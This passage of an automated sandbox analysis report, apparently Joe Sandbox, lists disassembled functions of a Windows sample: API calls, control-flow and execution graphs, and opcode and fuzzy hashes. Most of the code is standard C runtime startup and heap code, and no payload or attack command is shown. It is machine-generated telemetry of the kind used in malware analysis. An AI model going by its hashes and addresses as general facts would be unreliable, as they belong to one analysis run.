                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                  • String ID:
                                                                                  • API String ID: 1597249276-0
                                                                                  • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction ID: 4f607f38386533a121d1a3f32acb0c9123260ccd1615c465200f568fef2e300f
                                                                                  • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                  • Instruction Fuzzy Hash: 10B0123258030C33EB212A86EC03F063F0D87C1BA0F250020FA0D1D1F1A9A3B96180CA

                                                                                  Non-executed Functions

                                                                                  Function 003310CC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00331346
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0033135B
                                                                                  • UnhandledExceptionFilter.KERNEL32(0033816C), ref: 00331366
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00331382
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00331389
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 2579439406-0
                                                                                  • Opcode ID: e38110ee8c6f1a1afb235b1a3203fef9104189fe8462ff25f9e6d83a40310627
                                                                                  • Instruction ID: a92f96bcc20b0249731a43774a552fc301ba4b93f45fb8fd9bc0b8a0fda3c70e
                                                                                  • Opcode Fuzzy Hash: e38110ee8c6f1a1afb235b1a3203fef9104189fe8462ff25f9e6d83a40310627
                                                                                  • Instruction Fuzzy Hash: 5C21CFB4900B049FC717DF25FDD86543BB8BB18342F40501AE58887A70DBB85988CF46
                                                                                  Function 003321E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00339458,0000000C,00332320,00000000,00000000,?,0033174F,00000003,?,?,?,?,?,?,003310F6), ref: 003321F7
                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 00332202
                                                                                    • Part of subcall function 003313E1: Sleep.KERNEL32(000003E8,00000000,?,00332148,KERNEL32.DLL,?,00332194,?,0033174F,00000003), ref: 003313ED
                                                                                    • Part of subcall function 003313E1: GetModuleHandleW.KERNEL32(?,?,00332148,KERNEL32.DLL,?,00332194,?,0033174F,00000003,?,?,?,?,?,?,003310F6), ref: 003313F6
                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0033222B
                                                                                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0033223B
                                                                                  • __lock.LIBCMT ref: 0033225D
                                                                                  • InterlockedIncrement.KERNEL32(0033A4D8), ref: 0033226A
                                                                                  • __lock.LIBCMT ref: 0033227E
                                                                                  • ___addlocaleref.LIBCMT ref: 0033229C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                  • API String ID: 1028249917-2843748187
                                                                                  • Opcode ID: ac6b62b168fe9c491529e75373cdcb362784ecfb768d413e1c55729171e6a6ce
                                                                                  • Instruction ID: 92943c708f50bd57c65c528a52a85904e052ee430ef99b72a68f1d39651b3d56
                                                                                  • Opcode Fuzzy Hash: ac6b62b168fe9c491529e75373cdcb362784ecfb768d413e1c55729171e6a6ce
                                                                                  • Instruction Fuzzy Hash: D611A271940701AFD722EF76DCC5B4BBBE4AF14310F104919F499D72A1CF749A448B25
                                                                                  Function 003340A0 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 170 3340a0-3340bb call 33264c call 332345 175 3340da-3340f2 call 332aa0 170->175 176 3340bd-3340c1 170->176 181 3340f4-3340f6 175->181 182 33412a-334136 call 33413b 175->182 176->175 177 3340c3 176->177 179 3340c6-3340c8 177->179 183 3340d2-3340d9 call 332691 179->183 184 3340ca-3340d1 call 331411 179->184 185 334112-334124 InterlockedIncrement 181->185 186 3340f8-334101 InterlockedDecrement 181->186 182->179 184->183 185->182 186->185 190 334103-334109 186->190 190->185 194 33410b-334111 call 3335ee 190->194 194->185
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 003340AC
                                                                                    • Part of subcall function 00332345: __getptd_noexit.LIBCMT ref: 00332348
                                                                                    • Part of subcall function 00332345: __amsg_exit.LIBCMT ref: 00332355
                                                                                  • __amsg_exit.LIBCMT ref: 003340CC
                                                                                  • __lock.LIBCMT ref: 003340DC
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 003340F9
                                                                                  • InterlockedIncrement.KERNEL32(02452B08), ref: 00334124
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 4271482742-0
                                                                                  • Opcode ID: c89c769f9369957c4175ea6457906df936520660c7049b0a86f206c88ffe30eb
                                                                                  • Instruction ID: 81a8a1f414916912e566e382d1a00d9e3a9009939170ce1aa6afbece4656ef48
                                                                                  • Opcode Fuzzy Hash: c89c769f9369957c4175ea6457906df936520660c7049b0a86f206c88ffe30eb
                                                                                  • Instruction Fuzzy Hash: 3D019232E01A15EBD727AF2598C675EB364BF00710F164005F940BB691CB74BD91DBD6
                                                                                  Function 003335EE Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 197 3335ee-3335ff call 33264c 200 333601-333608 197->200 201 333676-33367b call 332691 197->201 202 33360a-333622 call 332aa0 call 3345e4 200->202 203 33364d 200->203 215 333624-33362c call 334614 202->215 216 33362d-33363d call 333644 202->216 205 33364e-33365e HeapFree 203->205 205->201 208 333660-333675 call 332c72 GetLastError call 332c30 205->208 208->201 215->216 216->201 222 33363f-333642 216->222 222->205
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 0033360C
                                                                                    • Part of subcall function 00332AA0: __mtinitlocknum.LIBCMT ref: 00332AB6
                                                                                    • Part of subcall function 00332AA0: __amsg_exit.LIBCMT ref: 00332AC2
                                                                                    • Part of subcall function 00332AA0: EnterCriticalSection.KERNEL32(?,?,?,00335600,00000004,00339628,0000000C,00333746,?,?,00000000,00000000,00000000,?,003322F7,00000001), ref: 00332ACA
                                                                                  • ___sbh_find_block.LIBCMT ref: 00333617
                                                                                  • ___sbh_free_block.LIBCMT ref: 00333626
                                                                                  • HeapFree.KERNEL32(00000000,?,00339568,0000000C,00332A81,00000000,003394C8,0000000C,00332ABB,?,?,?,00335600,00000004,00339628,0000000C), ref: 00333656
                                                                                  • GetLastError.KERNEL32(?,00335600,00000004,00339628,0000000C,00333746,?,?,00000000,00000000,00000000,?,003322F7,00000001,00000214), ref: 00333667
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: b73cecd8ca76fd8b29ca6aa31384017de95d15f6b738762a2c8923d1d3dbf493
                                                                                  • Instruction ID: 6484e68b180eb6f6a3efc2c42df671e0da89713f9d86284bf051f5bd0a072ba0
                                                                                  • Opcode Fuzzy Hash: b73cecd8ca76fd8b29ca6aa31384017de95d15f6b738762a2c8923d1d3dbf493
                                                                                  • Instruction Fuzzy Hash: EB018171D04305BFDB236F719CC7B9E7A68AF11760F618009F540AA292CF788A80CB59
                                                                                  Function 00333E04 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 223 333e04-333e1f call 33264c call 332345 228 333e43-333e6c call 332aa0 call 333dc6 call 333e6e 223->228 229 333e21-333e25 223->229 237 333e2f-333e31 228->237 229->228 230 333e27-333e2c call 332345 229->230 230->237 239 333e33-333e3a call 331411 237->239 240 333e3b-333e42 call 332691 237->240 239->240
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 00333E10
                                                                                    • Part of subcall function 00332345: __getptd_noexit.LIBCMT ref: 00332348
                                                                                    • Part of subcall function 00332345: __amsg_exit.LIBCMT ref: 00332355
                                                                                  • __getptd.LIBCMT ref: 00333E27
                                                                                  • __amsg_exit.LIBCMT ref: 00333E35
                                                                                  • __lock.LIBCMT ref: 00333E45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 3521780317-0
                                                                                  • Opcode ID: c5d6cb1d072fc358bba12710f5f38909c7ea8f120ed32fec2fa0fc4ac372b762
                                                                                  • Instruction ID: ada47d3bab99f01757adbbe7d03bec3caa5dcbc1a98dbf09c8084f503ecc8ad9
                                                                                  • Opcode Fuzzy Hash: c5d6cb1d072fc358bba12710f5f38909c7ea8f120ed32fec2fa0fc4ac372b762
                                                                                  • Instruction Fuzzy Hash: 79F05E33A447019BD763FB7588C774E73A0AF44B20F518699E4819F6E2CFB49A81CB52

                                                                                  Execution Graph

                                                                                  Execution Coverage:6%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:1048
                                                                                  Total number of Limit Nodes:28
                                                                                  execution_graph 3871 3026b0 3872 3026e9 3871->3872 3873 3026dc 3871->3873 3875 3010cc __setmbcp_nolock 5 API calls 3872->3875 3874 3010cc __setmbcp_nolock 5 API calls 3873->3874 3874->3872 3881 3026f9 __except_handler4 __IsNonwritableInCurrentImage 3875->3881 3876 30277c 3877 302752 __except_handler4 3877->3876 3878 30276c 3877->3878 3879 3010cc __setmbcp_nolock 5 API calls 3877->3879 3880 3010cc __setmbcp_nolock 5 API calls 3878->3880 3879->3878 3880->3876 3881->3876 3881->3877 3887 3051ca RtlUnwind 3881->3887 3883 3027cb __except_handler4 3884 3027ff 3883->3884 3885 3010cc __setmbcp_nolock 5 API calls 3883->3885 3886 3010cc __setmbcp_nolock 5 API calls 3884->3886 3885->3884 3886->3877 3887->3883 3909 301391 3910 3013cd 3909->3910 3912 3013a3 3909->3912 3912->3910 3913 3028da 3912->3913 3914 3028e6 __freefls@4 3913->3914 3919 302345 3914->3919 3920 3022cc __getptd_noexit 66 API calls 3919->3920 3921 30234d 3920->3921 3922 30235a 3921->3922 3923 301411 __amsg_exit 66 API calls 3921->3923 3924 3051fb 3922->3924 3923->3922 3925 305221 3924->3925 3926 30521a 3924->3926 3936 302f92 3925->3936 3927 301719 __NMSG_WRITE 66 API calls 3926->3927 3927->3925 3931 30530a 3960 301697 3931->3960 3933 305232 __setmbcp_nolock 3933->3931 3935 3052ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3933->3935 3935->3931 3937 3020f9 __decode_pointer 6 API calls 3936->3937 3938 302f9d 3937->3938 3938->3933 3939 302f9f 3938->3939 3943 302fab __freefls@4 3939->3943 3940 303007 3941 302fe8 3940->3941 3946 303016 3940->3946 3945 3020f9 __decode_pointer 6 API calls 3941->3945 3942 302fd2 3944 3022cc __getptd_noexit 66 API calls 3942->3944 3943->3940 3943->3941 3943->3942 3949 302fce 3943->3949 3947 302fd7 _siglookup 3944->3947 3945->3947 3948 302c72 __set_error_mode 66 API calls 3946->3948 3951 30307d 3947->3951 3953 301697 _abort 66 API calls 3947->3953 3959 302fe0 __freefls@4 3947->3959 3950 30301b 3948->3950 3949->3942 3949->3946 3952 302c0a __set_error_mode 6 API calls 3950->3952 3954 302aa0 __lock 66 API calls 3951->3954 3956 303088 3951->3956 3952->3959 3953->3951 3954->3956 3955 3020f0 __init_pointers 6 API calls 3957 3030bd 3955->3957 3956->3955 3956->3957 3963 303113 3957->3963 3959->3933 3961 301555 _doexit 66 API calls 3960->3961 3962 3016a8 3961->3962 3964 303120 3963->3964 3965 303119 3963->3965 3964->3959 3967 3029c6 LeaveCriticalSection 3965->3967 3967->3964 3888 3031b4 3889 3031c0 SetLastError 3888->3889 3890 3031c8 __freefls@4 3888->3890 3889->3890 3891 305138 3892 30514a 3891->3892 3894 305158 @_EH4_CallFilterFunc@8 3891->3894 3893 3010cc __setmbcp_nolock 5 API calls 3892->3893 3893->3894 3895 30543d 3896 301411 __amsg_exit 66 API calls 3895->3896 3897 305444 3896->3897 3979 3028fe 3980 302901 3979->3980 3981 3051fb _abort 68 API calls 3980->3981 3982 30290d __freefls@4 3981->3982 3898 302d3f 3899 303730 __calloc_crt 66 API calls 3898->3899 3900 302d4b 3899->3900 3901 30207e __encode_pointer 6 API calls 3900->3901 3902 302d53 3901->3902 3987 30235f 3989 30236b __freefls@4 3987->3989 3988 302383 3992 3035ee __freefls@4 66 API calls 3988->3992 3996 302391 3988->3996 3989->3988 3990 30246d __freefls@4 3989->3990 3991 3035ee __freefls@4 66 API calls 3989->3991 3991->3988 3992->3996 3993 3035ee __freefls@4 66 API calls 3994 30239f 3993->3994 3995 3023ad 3994->3995 3997 3035ee __freefls@4 66 API calls 3994->3997 3998 3023bb 3995->3998 3999 3035ee __freefls@4 66 API calls 3995->3999 3996->3993 3996->3994 3997->3995 4000 3023c9 3998->4000 4002 3035ee __freefls@4 66 API calls 3998->4002 3999->3998 4001 3023d7 4000->4001 4003 3035ee __freefls@4 66 API calls 4000->4003 4004 3023e8 4001->4004 4005 3035ee __freefls@4 66 API calls 4001->4005 4002->4000 4003->4001 4006 302aa0 __lock 66 API calls 4004->4006 4005->4004 4007 3023f0 4006->4007 4008 302415 4007->4008 4009 3023fc InterlockedDecrement 4007->4009 4023 302479 4008->4023 4009->4008 4011 302407 4009->4011 4011->4008 4014 3035ee __freefls@4 66 API calls 4011->4014 4013 302aa0 __lock 66 API calls 4015 302429 4013->4015 4014->4008 4016 30245a 4015->4016 4026 303d2d 4015->4026 4070 302485 4016->4070 4020 3035ee __freefls@4 66 API calls 4020->3990 4073 3029c6 LeaveCriticalSection 4023->4073 4025 302422 4025->4013 4027 30243e 4026->4027 4028 303d3e InterlockedDecrement 4026->4028 4027->4016 4040 303b55 4027->4040 4029 303d53 InterlockedDecrement 4028->4029 4030 303d56 4028->4030 4029->4030 4031 303d60 InterlockedDecrement 4030->4031 4032 303d63 4030->4032 4031->4032 4033 303d70 4032->4033 4034 303d6d InterlockedDecrement 4032->4034 4035 303d7a InterlockedDecrement 4033->4035 4036 303d7d 4033->4036 4034->4033 4035->4036 4037 303d96 InterlockedDecrement 4036->4037 4038 303da6 InterlockedDecrement 4036->4038 4039 303db1 InterlockedDecrement 4036->4039 4037->4036 4038->4036 4039->4027 4041 303bd9 4040->4041 4046 303b6c 4040->4046 4042 303c26 4041->4042 4043 3035ee __freefls@4 66 API calls 4041->4043 4059 303c4d 4042->4059 4098 305ae1 4042->4098 4045 303bfa 4043->4045 4050 3035ee __freefls@4 66 API calls 4045->4050 4046->4041 4049 303ba0 4046->4049 4053 3035ee __freefls@4 66 API calls 4046->4053 4048 303bc1 4051 3035ee __freefls@4 66 API calls 4048->4051 4049->4048 4060 3035ee __freefls@4 66 API calls 4049->4060 4055 303c0d 4050->4055 4056 303bce 4051->4056 4052 303c92 4057 3035ee __freefls@4 66 API calls 4052->4057 4058 303b95 4053->4058 4054 3035ee __freefls@4 66 API calls 4054->4059 4062 3035ee __freefls@4 66 API calls 4055->4062 4063 3035ee __freefls@4 66 API calls 4056->4063 4064 303c98 4057->4064 4074 305cbb 4058->4074 4059->4052 4061 3035ee 66 API calls __freefls@4 4059->4061 4066 303bb6 4060->4066 4061->4059 4067 303c1b 4062->4067 4063->4041 4064->4016 4090 305c76 4066->4090 4069 3035ee __freefls@4 66 API calls 4067->4069 4069->4042 4186 3029c6 LeaveCriticalSection 4070->4186 4072 302467 4072->4020 4073->4025 4075 305cc8 4074->4075 4089 305d45 4074->4089 4076 305cd9 4075->4076 4078 3035ee __freefls@4 66 API calls 4075->4078 4077 305ceb 4076->4077 4079 3035ee __freefls@4 66 API calls 4076->4079 4080 305cfd 4077->4080 4081 3035ee __freefls@4 66 API calls 4077->4081 4078->4076 4079->4077 4082 3035ee __freefls@4 66 API calls 4080->4082 4085 305d0f 4080->4085 4081->4080 4082->4085 4083 305d33 4088 3035ee __freefls@4 66 API calls 4083->4088 4083->4089 4084 305d21 4084->4083 4087 3035ee __freefls@4 66 API calls 4084->4087 4085->4084 4086 3035ee __freefls@4 66 API calls 4085->4086 4086->4084 4087->4083 4088->4089 4089->4049 4091 305c83 4090->4091 4097 305cb7 4090->4097 4092 305c93 4091->4092 4093 3035ee __freefls@4 66 API calls 4091->4093 4094 3035ee __freefls@4 66 API calls 4092->4094 4095 305ca5 4092->4095 4093->4092 4094->4095 4096 3035ee __freefls@4 66 API calls 4095->4096 4095->4097 4096->4097 4097->4048 4099 305af2 4098->4099 4185 303c46 4098->4185 4100 3035ee __freefls@4 66 API calls 4099->4100 4101 305afa 4100->4101 4102 3035ee __freefls@4 66 API calls 4101->4102 4103 305b02 4102->4103 4104 3035ee __freefls@4 66 API calls 4103->4104 4105 305b0a 4104->4105 4106 3035ee __freefls@4 66 API calls 4105->4106 4107 305b12 4106->4107 4108 3035ee __freefls@4 66 API calls 4107->4108 4109 305b1a 4108->4109 4110 3035ee __freefls@4 66 API calls 4109->4110 4111 305b22 4110->4111 4112 3035ee __freefls@4 66 API calls 4111->4112 4113 305b29 4112->4113 4114 3035ee __freefls@4 66 API calls 4113->4114 4115 305b31 4114->4115 4116 3035ee __freefls@4 66 API calls 4115->4116 4117 305b39 4116->4117 4118 3035ee __freefls@4 66 API calls 4117->4118 4119 305b41 4118->4119 4120 3035ee __freefls@4 66 API calls 4119->4120 4121 305b49 4120->4121 4122 3035ee __freefls@4 66 API calls 4121->4122 4123 305b51 4122->4123 4124 3035ee __freefls@4 66 API calls 4123->4124 4125 305b59 4124->4125 4126 3035ee __freefls@4 66 API calls 4125->4126 4127 305b61 4126->4127 4128 3035ee __freefls@4 66 API calls 4127->4128 4129 305b69 4128->4129 4130 3035ee __freefls@4 66 API calls 4129->4130 4131 305b71 4130->4131 4132 3035ee __freefls@4 66 API calls 4131->4132 4133 305b7c 4132->4133 4134 3035ee __freefls@4 66 API calls 4133->4134 4135 305b84 4134->4135 4136 3035ee __freefls@4 66 API calls 4135->4136 4137 305b8c 4136->4137 4138 3035ee __freefls@4 66 API calls 4137->4138 4139 305b94 4138->4139 4140 3035ee __freefls@4 66 API calls 4139->4140 4141 305b9c 4140->4141 4142 3035ee __freefls@4 66 API calls 4141->4142 4143 305ba4 4142->4143 4144 3035ee __freefls@4 66 API calls 4143->4144 4145 305bac 4144->4145 4146 3035ee __freefls@4 66 API calls 4145->4146 4147 305bb4 4146->4147 4148 3035ee __freefls@4 66 API calls 4147->4148 4149 305bbc 4148->4149 4150 3035ee __freefls@4 66 API calls 4149->4150 4151 305bc4 4150->4151 4152 3035ee __freefls@4 66 API calls 4151->4152 4153 305bcc 4152->4153 4154 3035ee __freefls@4 66 API calls 4153->4154 4155 305bd4 4154->4155 4156 3035ee __freefls@4 66 API calls 4155->4156 4157 305bdc 4156->4157 4158 3035ee __freefls@4 66 API calls 4157->4158 4159 305be4 4158->4159 4160 3035ee __freefls@4 66 API calls 4159->4160 4161 305bec 4160->4161 4162 3035ee __freefls@4 66 API calls 4161->4162 4163 305bf4 4162->4163 4164 3035ee __freefls@4 66 API calls 4163->4164 4165 305c02 4164->4165 4166 3035ee __freefls@4 66 API calls 4165->4166 4167 305c0d 4166->4167 4168 3035ee __freefls@4 66 API calls 4167->4168 4169 305c18 4168->4169 4170 3035ee __freefls@4 66 API calls 4169->4170 4171 305c23 4170->4171 4172 3035ee __freefls@4 66 API calls 4171->4172 4173 305c2e 4172->4173 4174 3035ee __freefls@4 66 API calls 4173->4174 4175 305c39 4174->4175 4176 3035ee __freefls@4 66 API calls 4175->4176 4177 305c44 4176->4177 4178 3035ee __freefls@4 66 API calls 4177->4178 4179 305c4f 4178->4179 4180 3035ee __freefls@4 66 API calls 4179->4180 4181 305c5a 4180->4181 4182 3035ee __freefls@4 66 API calls 4181->4182 4183 305c65 4182->4183 4184 3035ee __freefls@4 66 API calls 4183->4184 4184->4185 4185->4054 4186->4072 3968 301281 3971 30283c 3968->3971 3970 301286 3970->3970 3972 302861 3971->3972 3973 30286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3971->3973 3972->3973 3974 302865 3972->3974 3973->3974 3974->3970 4187 301242 4188 301251 4187->4188 4189 301257 4187->4189 4190 301697 _abort 66 API calls 4188->4190 4193 3016bc 4189->4193 4190->4189 4192 30125c __freefls@4 4194 301555 _doexit 66 API calls 4193->4194 4195 3016c7 4194->4195 4195->4192 3183 301104 3220 30264c 3183->3220 3185 301110 GetStartupInfoW 3187 301133 3185->3187 3221 30261b HeapCreate 3187->3221 3189 301183 3223 30248e GetModuleHandleW 3189->3223 3193 301194 __RTC_Initialize 3257 301dde 3193->3257 3194 3010db _fast_error_exit 66 API calls 3194->3193 3196 3011a2 3197 3011ae GetCommandLineW 3196->3197 3331 301411 3196->3331 3272 301d81 GetEnvironmentStringsW 3197->3272 3201 3011bd 3281 301cd3 GetModuleFileNameW 3201->3281 3204 3011d2 3287 301aa4 3204->3287 3206 301411 __amsg_exit 66 API calls 3206->3204 3208 301411 __amsg_exit 66 API calls 3210 3011e3 3208->3210 3300 3014d0 3210->3300 3211 3011ea 3212 301411 __amsg_exit 66 API calls 3211->3212 3213 3011f5 __wwincmdln 3211->3213 3212->3213 3306 301000 CoInitialize CreateMutexW 3213->3306 3215 301216 3216 301224 3215->3216 3320 301681 3215->3320 3338 3016ad 3216->3338 3219 301229 __freefls@4 3220->3185 3222 301177 3221->3222 3222->3189 3323 3010db 3222->3323 3224 3024a2 3223->3224 3225 3024a9 3223->3225 3341 3013e1 3224->3341 3227 302611 3225->3227 3228 3024b3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3225->3228 3400 3021a8 3227->3400 3230 3024fc TlsAlloc 3228->3230 3233 301189 3230->3233 3234 30254a TlsSetValue 3230->3234 3233->3193 3233->3194 3234->3233 3235 30255b 3234->3235 3345 3016cb 3235->3345 3240 30207e __encode_pointer 6 API calls 3241 30257b 3240->3241 3242 30207e __encode_pointer 6 API calls 3241->3242 3243 30258b 3242->3243 3244 30207e __encode_pointer 6 API calls 3243->3244 3245 30259b 3244->3245 3362 302924 3245->3362 3252 3020f9 __decode_pointer 6 API calls 3253 3025ef 3252->3253 3253->3227 3254 3025f6 3253->3254 3382 3021e5 3254->3382 3256 3025fe GetCurrentThreadId 3256->3233 3727 30264c 3257->3727 3259 301dea GetStartupInfoA 3260 303730 __calloc_crt 66 API calls 3259->3260 3268 301e0b 3260->3268 3261 302029 __freefls@4 3261->3196 3262 301fa6 GetStdHandle 3267 301f70 3262->3267 3263 303730 __calloc_crt 66 API calls 3263->3268 3264 30200b SetHandleCount 3264->3261 3265 301fb8 GetFileType 3265->3267 3266 301ef3 3266->3261 3266->3267 3269 301f1c GetFileType 3266->3269 3271 30317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3266->3271 3267->3261 3267->3262 3267->3264 3267->3265 3270 30317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3267->3270 3268->3261 3268->3263 3268->3266 3268->3267 3269->3266 3270->3267 3271->3266 3273 301d92 3272->3273 3275 301d96 3272->3275 3273->3201 3274 301da9 3276 3036eb __malloc_crt 66 API calls 3274->3276 3275->3274 3275->3275 3277 301db7 3276->3277 3278 301dbe FreeEnvironmentStringsW 3277->3278 3728 3037f0 3277->3728 3278->3201 3282 301d08 _wparse_cmdline 3281->3282 3283 3011c7 3282->3283 3284 301d45 3282->3284 3283->3204 3283->3206 3285 3036eb __malloc_crt 66 API calls 3284->3285 3286 301d4b _wparse_cmdline 3285->3286 3286->3283 3288 301abc _wcslen 3287->3288 3292 3011d8 3287->3292 3289 303730 __calloc_crt 66 API calls 3288->3289 3297 301ae0 _wcslen 3289->3297 3290 301b45 3291 3035ee __freefls@4 66 API calls 3290->3291 3291->3292 3292->3208 3292->3210 3293 303730 __calloc_crt 66 API calls 3293->3297 3294 301b6b 3295 3035ee __freefls@4 66 API calls 3294->3295 3295->3292 3297->3290 3297->3292 3297->3293 3297->3294 3298 301b2a 3297->3298 3732 30367c 3297->3732 3298->3297 3299 302ae2 __invoke_watson 10 API calls 3298->3299 3299->3298 3301 3014de __IsNonwritableInCurrentImage 3300->3301 3741 302dc3 3301->3741 3303 3014fc __initterm_e 3305 30151b __IsNonwritableInCurrentImage __initterm 3303->3305 3745 302dac 3303->3745 3305->3211 3307 301035 GetCommandLineW CommandLineToArgvW 3306->3307 3308 30101f 